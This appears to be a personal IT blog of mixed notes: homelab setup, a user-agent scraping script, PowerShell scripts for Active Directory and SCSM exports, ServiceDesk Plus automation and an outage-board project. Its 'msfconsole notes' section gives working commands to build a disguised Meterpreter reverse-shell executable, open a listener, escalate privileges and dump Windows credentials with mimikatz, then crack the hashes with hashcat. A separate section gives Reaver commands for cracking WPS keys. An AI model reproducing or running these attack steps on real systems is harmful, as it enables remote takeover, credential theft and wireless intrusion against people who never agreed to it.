Syncthing, for syncing things. and other things

Some things i’ve done in the last couple months

  • Installed ESXi on an old HP Z210, Core i7-2600 with 4 GB of RAM
    It’s running CentOS 7, Windows 10, and Kali VMs simultaneously, which is surprising given there’s only 4 GB of RAM. They all run extremely well; I had no usability issues even with the Win 10 machine running Chrome and 20 tabs. I’ve only allocated a gig of RAM to Win 10, and 768 MB each to Kali and CentOS.
  • On CentOS I’ve set up an anonymous Samba share, which was a pain, because since Win10 1803 (or thereabouts) you can no longer connect anonymously/as a guest to shares by default. You have to jump into gpedit on the Win10 machine and enable a policy (there’s a registry equivalent sketched just after this list):
    Computer Configuration\Administrative Templates\Network\Lanman Workstation
    “Enable insecure guest logons”


    Having said that, it’s really bad practice: I should be following the Samba setup for CentOS 7 on Linuxize, not doing whatever I did.
  • I’ve set up Syncthing on CentOS to point to the open Samba share, so files dropped in that share are synced to my phone.
    prit coo’.
    Syncthing was pretty straightforward, just follow the docs (search them for firewall and port forwarding).
  • Installed TeX Live and TeXstudio (Win 10) to compile some LaTeX templates off Overleaf. Feels like installing TeX Live is way too much messing around (6 gig download for the default install 😓) when you can just modify the template directly on Overleaf. LaTeX is a great way to produce good looking documents though.
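
Side note on that guest logon policy: if you’d rather not click through gpedit, the setting appears to map to a registry value (AllowInsecureGuestAuth under the LanmanWorkstation policy key). That mapping is from memory, so double-check it against gpedit before trusting it. From an elevated PowerShell prompt:

$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\LanmanWorkstation'
New-Item -Path $key -Force | Out-Null

# 1 = allow insecure guest logons (same effect as enabling the policy)
New-ItemProperty -Path $key -Name AllowInsecureGuestAuth -PropertyType DWord -Value 1 -Force | Out-Null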

use python to scrape a site and not look like a bot

can’t find the Python I wrote to do this… luckily it’s super simple

something something Python requests, but construct a user-agent string to supply with the request first…

use any generic browser user agent string, eg. Chrome version 75 on Windows 10:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36

User-agent parsing breakdown can be found on WhatIsMyBrowser.com

Choose a specific user-agent here (same site)

then do something with the return in Beautiful Soup or regex or something something…
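
Since the original script has gone walkabout, here’s a rough reconstruction of the idea rather than the actual code: the requests + user-agent + Beautiful Soup pattern described above. The URL and the soup bit at the end are placeholders, so point them at whatever you’re actually scraping.

import requests
from bs4 import BeautifulSoup

# pretend to be Chrome 75 on Windows 10 instead of the default python-requests agent
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                  "AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/75.0.3770.142 Safari/537.36"
}

# example.com is a placeholder - swap in the site you actually want
response = requests.get("https://example.com", headers=headers)
response.raise_for_status()

# then do something with the return, e.g. grab all the links
soup = BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a"):
    print(link.get_text(strip=True), link.get("href"))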

msfconsole notes

This is another notes dump, just spitting out what i was doing and my thoughts at the time i was doing it.
I hit a few roadblocks because i was trying this on a fully patched Win 10 1903 machine. Would probably have more luck on Windows 7 or (lol) XP.

# create a meterpreter payload (just an exe) to run on the target windows machine
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform win -f exe LHOST=192.168.0.187 LPORT=4444 -o /root/nothingsuss.exe

# if you're targeting a 64 bit machine use this
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform win -f exe LHOST=192.168.0.187 LPORT=4444 -o /root/nothingsuss.exe

# if you're not sure, maybe go 32 bit, then inject the 64 bit version once you're in a
# meterpreter shell and it turns out the box is 64 bit
# (background the session first - SESSION below is its id from the sessions command)
use exploit/windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.0.187
set LPORT 4445
run

# startup msfconsole and open a handler for the payload type, in this case meterpreter
# if you have a x64 payload, use a x64 listener here, ie windows/x64/meterpreter/reverse_tcp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 4444
exploit

# run nothingsuss.exe on the target machine

# check/elevate to SYSTEM
# run the .exe (generated from msfvenom above) on the target machine as admin, or else getsystem probably wont work
getuid
getsystem

# is this machine x86 or x64? need to run the correct version of mimikatz or most functions wont work
sysinfo

# list processes
ps

# migrate to one and, right now, pray it's the right one?
# (or run post/windows/manage/migrate instead)
migrate <pid of the process you picked from ps>

# crank up mimikatz
load mimikatz

# check privileges, we're looking for "20 OK"
# probably don't need this step since it's running in meterpreter as SYSTEM (hopefully)
mimikatz_command -f privileges::debug

# if not, elevate
# pretty sure the full form is mimikatz_command -f token::elevate
# can't remember
mimikatz_command -f token::elevate

# might need to do it a couple of times
mimikatz_command -f token::elevate

# now try to dump plaintext passwords
msv
kerberos
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonpasswords

# or get a hashdump. im guessing you then feed this to hashcat?
mimikatz_command -f samdump::hashes

# yay you probably did it!
mimikatz_command -f coffee

# didn't work, didn't have escalation to SYSTEM
# - use load kiwi instead of mimikatz?
# - background the meterpreter session and USE another exploit
# - enter something like: search platform:"windows 10" type:exploit rank:excellent
# - tried exploit/windows/local/lenovo_systemupdate on the open meterpreter session but not elevated
# - could be worth a look again

#-----------------------------------------------------------------------
# Invoke-Mimikatz exists as part of PowerSploit, which looks amazing
#-----------------------------------------------------------------------

# after hashdump in meterpreter, copy the hash you want to crack and
# feed it to hashcat to check against a wordlist
# -m specifies hash type (1000 is NTLM), -a 0 is dictionary attack, rest is obvious
hashcat -m 1000 -a 0 -o output.txt aad3b435b51404eeaad3b435b51404ee /usr/share/metasploit-framework/data/wordlists/password.lst

# don't forget kiwi_cmd in meterpreter
#
# don't forget your meterpreter payload needs to match the architecture of the target system
# if your shell dies every time it exploits a 32 bit machine, swap to the 64 bit meterpreter payload


Pro tip: look up the MS10-022 module in Metasploit and have a crack at an XP machine (pre Service Pack 3, I think).

some potentially useful powershell lines

Or not useful. Interesting-ish, I think, in that they can be expanded on and cleaned up to become properly useful.

  • Use SYDI cscript to get server.xml, convert that to JSON (codebeautify.org) and then convert that to a powershell object.
    There are probably easier ways to get all your servers’ properties as pliable objects, but this is one way.
$json = Get-Content -Raw -Path "C:\temp\trash\server.json" | ConvertFrom-Json

# go nuts on your $json server object
# awesome
$json.computer.processes.process #etc.



  • This young fellow will retrieve the password expiry dates of all AD-Users.
    Probably pipe this badboy to export-csv
######get the expiry date of passwords:
Get-ADUser -Filter {Enabled -eq $True -and PasswordNeverExpires -eq $False} -Properties "DisplayName", "msDS-UserPasswordExpiryTimeComputed" |
Select-Object -Property "Displayname",@{Name="ExpiryDate";Expression={[datetime]::FromFileTime($_."msDS-UserPasswordExpiryTimeComputed")}}



  • If any locked-out users are found, their usernames will be sent to the specified address in an email. How about that.
#counter -le 100 specifies that it will check a hundred times
for ($counter = 1; $counter -le 100; $counter++){
    Search-ADAccount -LockedOut | ForEach-Object {
        Send-MailMessage -SmtpServer "MAILSERVER" -To "joe.pesci@detrocity.net" -From "daniel.stern@detrocity.net" `
            -Subject "This person is locked out" -Body ($_.SamAccountName | Out-String)
    }
    Search-ADAccount -LockedOut | Select-Object SamAccountName

    #change the number here to adjust checking frequency - 600000 is 10 minutes
    Start-Sleep -Milliseconds 600000
}
  • A variation of this below prints a timestamp and name to the powershell output, rather than emailing.
for ($counter = 1; $counter -le 1000; $counter++){
    $Time = Get-Date
    Search-ADAccount -LockedOut | Select-Object Name, SamAccountName | Format-Table -AutoSize
    Start-Sleep -Milliseconds 10000
    Write-Host ($Time.ToString("`n-----------------------------`nyyyy/MM/dd - HH:mm:ss`n-----------------------------"))
}



  • Fill out a list of newline delimited computer names, and feed it to this script.
    It’ll use Get-WMIObject Win32_ComputerSystem, _BIOS, _OperatingSystem, etc. to return the details you’ve requested for each machine and then dump it in a csv.
    Obviously easily modifiable to get whatever WMI properties you want.
$Computers = Get-Content "C:\Temp\listofcomputernames.txt"
 
$Output = ForEach ($C in $Computers){
    $System = Get-WmiObject Win32_ComputerSystem -ComputerName $C | Select-Object -Property UserName,Model
    $BIOS = Get-WmiObject Win32_BIOS -ComputerName $C | Select-Object -Property SerialNumber
    $Time = icm $C {get-date -Format g}

    [PSCustomObject]@{
        ComputerName = $C
        MachineName = ($C | Out-String).Trim()
        UserName = ($System.UserName | Out-String).Trim()
        SerialNumber = ($BIOS.SerialNumber | Out-String).Trim()
        Model = ($System.Model | Out-String).Trim()
        Time = ($Time | Out-String).Trim()
    }
}

$Output | Export-CSV -Path "C:\Temp\machine_details.csv" -NoTypeInformation

 

  • There are others, but they’re too dirty for public consumption

using Reaver to crack a WPS key

I was going to write more of a guide on this but it was so long ago i can’t even remember the specifics.

I’ve had these notes following me around like a hit to my credit rating for like 7 years so i’m just going to dump them and run:

# start monitor mode on card:
airmon-ng start wlan1
 
# you'll get a monitor interface, named mon0 by default
# check WPS enabled networks around with wash:
wash -i mon0


# or airodump to check networks in general
airodump-ng mon0


# pick the BSSID, feed it to reaver and wait
# Example: 
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

#
# -vv is verbosity of on screen messages
# --channel to specify channel
# -d to set delay between pin attempts
# -t to set receive timeout
# --no-nacks if it's not working; can't remember exactly what it does
# all parameters explained via reaver --help

#monitor interface needs to be started on the same channel as the network you're trying to break

ez peas

ZWAMP! and the dirt is gone

So I wanted a wiki I could document useful things in, because I completely forgot about this blog.

I wanted it to be pickup-and-move-able in case I ever had to zip it and run from the machine I was using (in case I get fired and don’t see it coming, obv). So I googled “super lightweight Apache web server” and picked the fifth result: ZWAMP

In hindsight this was a poor decision, because my next search was for a super lightweight wiki. DokuWiki fit the bill, but the latest version of it needs PHP 5.6 at minimum.

ZWAMP includes Apache with vhosts, MongoDB, MySQL, probably some other stuff, but foremost in my hastily elicited requirements, PHP.

HOWEVER.

ZWAMP only supports up to PHP 5.4 currently, so I had to get an old version of DokuWiki that still supports PHP 5.4 and install that. It’s probably supes insecure, but I’m not planning on ever exposing it to the internet.
Security is always a concern but I scrape through as a millennial, so convenience is key. This is also why I grow my own avocados (hint: I fucking don’t).

Back on the train: ZWAMP running on startup and DokuWiki run pretty smoothly and work OK as a wiki. DokuWiki was unintuitive to me at first, possibly because I’ve never seen the backend of a wiki before. I ended up installing a few plugins to make life easier.

Really they just made it easier initially to organise the pages – now that I get the namespace/page syntax, it’s actually extremely easy, but I’m a simpleton, or I like doing things the easy way, or something, so I’m sticking with using and recommending these plugins.

After I got it up and running I got scared of losing it all running from the one folder and the one machine, so I set out to mirror the whole shebang to a cloud service. Actually i didn’t set out to do that, I just happened to come across Syncthing and thought it sounded interesting. Syncthing basically markets itself as a private user-provides-hardware cloud service.

So now I’m using Syncthing to mirror the changes to my phone as an intermediary device, and then from there to wherever my heart desires.

Once I’d done this, I landed on a few obvious questions I could have asked prior to expending all this effort:

  • Why not use a pre-established cloud service like OneDrive, Google Drive, Dropbox, SpiderOak, etc.?
  • Why even bother syncing website files between folders? Just host a wiki on a website on a server like a normal person, and have a single source of truth, as opposed to introducing the inevitable file conflicts awarded by a hastily thrown together private cloud service?

Fuck iiiiit, I do what I want

exporting out of SCSM – clawing back incident and request information

It actually wasn’t difficult at all, after 2 hours of googling and learning what it was I was actually looking for. System Center Service Manager is a beast that can do a lot, particularly with a finely tuned frontend (which I’ll refer to as its ‘skirt’ in this post) glued to its nether.

Ironic that Clippy should be suggesting this. But Microsoft open sourced calc.exe the other day and even runs Linux natively now, so... who knows...

The flipside is the cost of maintaining the skirt and the customisations. I can passably modify or write HTML and Javascript to produce some things of use, but from my brief view of SCSM (and its Cireson skirt), making a simple change requires full webdev abilities far beyond those of a service desk normie like myself. Suffice it to say the cost of getting a contractor in just to add a field to a request form (or, say, a pocket to a skirt) is not worth it for a smaller enterprise. It’s almost a full-time position improving and modifying Cireson for a frequently changing environment.

I can see that on the scale of thousands of employees it would be worth it for the time savings brought on by the automation it can offer. Or even if the project to put it in started with meticulously gathered and extremely well defined requirements, such that Cireson themselves could sew the whole skirt for you on the spot without requiring any additional measurements or alterations. But in the vein of continuous improvement brought on by frequently changing use cases, it looks (to me, don’t sue me) to be an extremely expensive pursuit for something easily covered by a one-size-fits-all muumuu. It’s also (IMO) heaps expensive.

But anyway, what do I know.

Here’s how to export your incidents out of SCSM to a CSV.

  1. Make sure you have SMLets installed on the SCSM server.
  2. Open up a Powershell window on the SCSM server.
  3. Run these lines, modifying the file path to where you want your .CSV to come out:

import-module SMLets

get-scsmincident | Select-Object -Property ID, Status, Title, @{l='Description';e={$_.Description -replace "`n"," "}}, AffectedUser, AssignedTo, CreatedDate, TierQueue, Urgency, Priority | export-csv C:\temp\SCSM_Incidents.csv -NoTypeInformation

Super easy. You might be saying, gross, what’s that part in the middle with the Description property? Well most Incident descriptions will contain a carriage return which export-csv identifies as a delimiter, chopping off the rest of the description after the first carriage return.

With @{l='Description';e={$_.Description -replace "`n"," "}} you will replace all carriage returns in the description with spaces, retaining all that preciously descriptive information. I could describe my lawn in the request, in perfect detail, and you’ll get it.

You can see properties I’ve opted to keep in the select-object -properties. If you want to see all the available fields, just pipe get-scsmincident straight to export-csv and have a look at the resulting file – then you can edit the command above to include the extra columns you want.

Exporting all the Service Requests was slightly harder because the affected user doesn’t seem to be stored in the Service Requests class – it strikes me as painfully obvious that it should be but I reiterate: what do I know? For some reason you have to get that information from the Relationship class and then the way I joined them was to stick them in Excel sheets and do a VLOOKUP to cross-reference the request ID to the Affected User.

Here’s how to export your service requests out of SCSM to a CSV.

  1. Make sure you have SMLets installed on the SCSM server.
  2. Open up a Powershell window on the SCSM server.
  3. Run these commands:
import-module SMLets

$SRClass = Get-SCSMClass System.WorkItem.ServiceRequest$

Get-SCSMObject -Class $SRClass | Select-Object -Property ID, Status, Urgency, Priority, Title, @{l='Description';e={$_.Description -replace "`n"," "}}, Notes, CreatedDate, SupportGroup | export-csv C:\temp\SCSM_Service_Requests.csv -NoTypeInformation

$Relclass = Get-SCSMRelationshipClass System.WorkItemAffectedUser

Get-SCSMRelationshipObject $Relclass | Export-Csv C:\temp\SCSCM_SR_Affected_User.csv -NoTypeInformation

You will see that this gives you two files which you can now open up and do a VLOOKUP on. There are other values you can get this way – one such useful one which I did not get (but you could!) is the System.WorkItemAssignedToUser which will tell you which technician it has been assigned to.

You could grab this by substituting System.WorkItemAssignedToUser in the place of System.WorkItemAffectedUser in the lines above. Obviously then you’d have yet another CSV to do another VLOOKUP on, but it should work. And more importantly, I couldn’t find an easier way.
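
If you’d rather not do the VLOOKUP in Excel, the same join can be done in PowerShell once you have the two CSVs. This is a rough, untested sketch: the SourceObject and TargetObject column names are assumptions, so open the relationship CSV, check what the columns holding the SR ID and the user are actually called, and substitute those in.

$requests  = Import-Csv C:\temp\SCSM_Service_Requests.csv
$relations = Import-Csv C:\temp\SCSCM_SR_Affected_User.csv

# build a lookup of SR ID -> affected user
# NOTE: SourceObject and TargetObject are placeholder column names - check your CSV headers
$affectedUser = @{}
foreach ($rel in $relations) {
    $affectedUser[$rel.SourceObject] = $rel.TargetObject
}

# bolt the affected user onto each service request - the VLOOKUP, basically
$requests |
    Select-Object *, @{l='AffectedUser';e={$affectedUser[$_.ID]}} |
    Export-Csv C:\temp\SCSM_SR_with_AffectedUser.csv -NoTypeInformation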

sdp powershell automation – at least that was the intent

ManageEngine ServiceDesk Plus has an option to call cmd.exe (and by extension any command line tool from there), which you can use to crank out some automation from a submitted service request.

If you open up SDP Admin and head on over to Custom Triggers, or I think Business Rules, you can set up an action to this effect:

cmd /c powershell.exe -WindowStyle Hidden -file D:\ManageEngine\ServiceDesk\integration\custom_scripts\test_add_distribution_group_member.ps1 "$COMPLETE_JSON_FILE"

Should be obvious that this runs Powershell in a hidden window and hands it $COMPLETE_JSON_FILE, which is a capture in JSON format of the available fields (including any custom ones you’ve added) that are created as part of a request in SDP. To funnel the JSON into the Powershell script, your .ps1 file needs to open with the following (ie. this should be the very first thing in the script):

param ( 
[string]$json = "none" 
)

To get this into a usable Powershell object (because objects are the whole point of Powershell) you want to pipe it into a new object thusly:

$data = Get-Content -Raw $json | ConvertFrom-Json

Now you’ve got yourself a friendly old buddy called $data containing all of the properties of the request. You can access the properties with $data.request.name or $data.request.subject, $data.request.customfield, etc.

I’ve tried to automate adding someone to a distribution group by installing Exchange Management Tools on the server and calling the cmdlet for updating a distro group per below:

$name = $data.request.login_name
$name = $name + '@domain.com.au'

#and what distribution group they want to be added to ('Distribution Group' is a custom field added to the request form)
$dgroup = $data.request.'Distribution Group'

#import exchange tools (have to install Exchange Management Tools on the server)
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn

#add to the group
Add-DistributionGroupMember -Identity $dgroup -Member $name

Unfortunately this doesn’t work completely yet: it throws a permissions error. I think it’s because the user running Powershell is the ServiceDeskPlus service account, which doesn’t have the appropriate privileges. Still working on it, but it looks like it should work once that’s sorted.

When I googled the error thrown by Powershell initially it led me to go into AD and allow the Exchange Trusted Subsystem to have modify permissions on all objects – I thought that would fix it at first but alas! It did not.

I’ve also tried to automate updating AD photos – that’s not working either but by George i’ll keep trying until it all goes down the same hole.

Here’s where I’m at with that one:

#paste this pipe in to dump the JSON you're receiving to an actual file
#| Out-File "D:\ManageEngine\ServiceDesk\integration\custom_scripts\SDP_test_data_AD.json"

####start actual script

#receive a parameter, should be a JSON file from SDP ($COMPLETE_JSON_FILE)
param (
    [string]$json = "none"

 )

#get it and turn it into a powershell object (keep -Raw on Get-Content and pipe straight into ConvertFrom-Json)
$data = Get-Content -Raw $json | ConvertFrom-Json

#can print the request object info with
#$data.request
#subsequent items 
#$data.request.subject

#images pasted into a submitted request go to /inlineimages/WorkOrder/*REQUESTID*/*UNIXTIMESTAMPINMILLISECONDS*.png
#if they're attached instead, they go to /fileAttachments/request/*MONTHYEAR*/*REQUESTID*/*ATTACHMENT_NAME*.EXT - could try that too
#think it's easier to get the images if they were pasted into the request rather than attached

#could specify the path to the photo like this 
$requestID = $data.request.workorderid
$photoPath = "D:\ManageEngine\ServiceDesk\inlineimages\WorkOrder\" + $requestID + "\*"

#then get the actual file like this
#there should only be one file in this directory, looking for either a png or a jpg
$photoFile = Get-ChildItem -Path $photopath -Include *.jpg,*.png

#then do this part to get the image as a byte array or something, I don't know
$photo = [byte[]](Get-Content $photoFile -Encoding byte)

#then get the user
$username = $data.request.login_name

#then set their profile photo to the one we just grabbed
############ NEED TO IMPORT-MODULE ACTIVEDIRECTORY before this will work
############ the module isnt available in get-module -listavailable
Import-Module ActiveDirectory
Set-ADUser $username -Replace @{thumbnailPhoto=$photo}

#need AD computers and users module maybe?
#questions/issues: 
#
#if we set it in AD does it then push out to the rest (exchange, skype, sharepoint)
#maximum file size is 100kb and 96x96 - what happens if it's too large?
#could use this script to resize it? https://gallery.technet.microsoft.com/scriptcenter/Resize-Image-A-PowerShell-3d26ef68

Again it looks alright to me, but this also throws permissions errors. Need to look at permissions for the SDP service account, or else try running the Powershell as another, privileged, user/service account.

the outageboard

A few months ago I whipped up (I say “whipped”, it took about 16 hours) an outage-board-style tool to capture some information about current or impending (ie. unscheduled or scheduled) outages. Unfortunately my zero UX skills and weak attempt at programming have resulted in something that is visually pleasing in neither the frontend nor the backend but which, granted, does function as a basic outage board.

This badboy is written in Visual Studio 2017, C# MVC and HTML + Javascript. It basically uses the StreamWriter class to write to a CSV file when you add an outage, and then uses StreamReader to populate the table with the contents of that CSV. This done properly would connect to a database rather than a flat text file but here we are.

This could easily be adapted to any other use for sharing communal or department-wide information, e.g. listing invoices that have come in and what actions have been taken against them: just rename the table headings to something like Invoice ID, Date Received, Amount, Due Date, Forwarded To, etc.

This is the dazzling frontend:

Captures basic info and lets you delete an outage based on the Outage Ref.
The outage reference is generated by using the first 6 characters of a GUID generated in the C#.

To match the Outage Ref string and delete the line/data associated with it, I pulled (copied) basically the entire class from an answer by a lad named Håvard Fjær on this StackOverflow question:

https://stackoverflow.com/questions/668907/how-to-delete-a-line-from-a-text-file-in-c

If you click the Add Advisory button you get this cute little form where you can specify the details of the outage you want to add – and get this, it will PRE-POPULATE the current time and date in there for you! If that’s not a consumer-focused enhancement, I don’t know what is!

The actual C# operating in the background is revolting, and the CSS to format these somewhat decent looking (if i say so myself) buttons is sloppy as *redacted*, but it’s tight, it works, that’s all I need.

Also, if you put a comma in the ETR or Outage Details it will throw another random column into the table for you. Sweet bug, but it’s mine so I’ll keep it.

Odds that I’ll ever improve this to be something viable enough to live outside of my own code graveyard are slim to none, especially given we don’t even use it in the workplace I built it for. But it could be useful one day (like if there was no outage-board solution at all) so I won’t shift-delete the project just yet.

If anyone wants the source I’ll put it somewhere, but I strongly urge you to look elsewhere for a quality solution first. If you end up actually making use of it, beyond as a submission to Coding Horror or a cautionary tale for new programmers, I’ll be very surprised, but also pleased… no, pleased isn’t a strong enough word. I’ll find it pleasurable.

The IIS_IUSRS account needs read/write/create on the C:\inetpub\wwwroot directory to create the CSV and write to it.
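
If you want to script that permission change rather than click through the folder’s Security tab, something along these lines from an elevated prompt should do it (Modify covers read, write and create; tighten it if you prefer):

icacls "C:\inetpub\wwwroot" /grant "IIS_IUSRS:(OI)(CI)M"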

I had no idea what I was doing when I created it, so this project is version controlled in Azure DevOps using TFS.

I’d rather use git, but I couldn’t easily convert it, and it’s fair to say I still don’t know what I’m doing.